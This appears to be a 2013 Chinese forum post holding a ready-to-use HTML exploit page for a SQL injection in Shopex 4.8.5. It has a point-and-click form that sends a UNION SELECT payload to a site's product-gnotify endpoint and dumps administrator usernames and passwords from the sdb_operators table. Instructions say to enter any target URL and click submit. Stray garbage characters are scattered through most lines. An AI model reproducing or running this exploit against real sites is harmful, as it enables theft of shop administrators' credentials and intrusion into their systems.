<center>2 z, g% K& o' ?0 T3 r1 B6 Z
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title> q. G: j0 _% K
<form action="" method="post" name="submit_url">2 p4 p* [7 u8 @5 m. ?# ?, C9 a
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>0 M% Q6 j" l1 F. Z O6 T
<input type="hidden" name="goods[goods_id]" value="3">
0 n% Q' A8 [% q3 `# ] T* ?<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">: k6 l3 t( a; a( }2 Q2 P
<input type="submit" value="给我注入" onclick=fsubmit()> Z$ R6 u3 A$ D* v
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
# f% f" l1 J' S6 E! X* e6 u+ H5 E
<script>
" Z1 m z$ _/ L6 S+ f7 ]function fsubmit(){
1 h9 l& q2 U7 iform = document.forms[0]; $ y& g" J/ f; B6 R, E( K
form.action = form.url.value+'/?product-gnotify';
$ q/ i2 ]- D# c9 Jform.submit(); : O2 U1 t" x8 T7 ~
}
( \% s% w0 U1 l! s; F$ W</script>
9 X1 w, H* s% x4 y y |
发表于 2013-1-23 09:20:52
收藏
支持
反对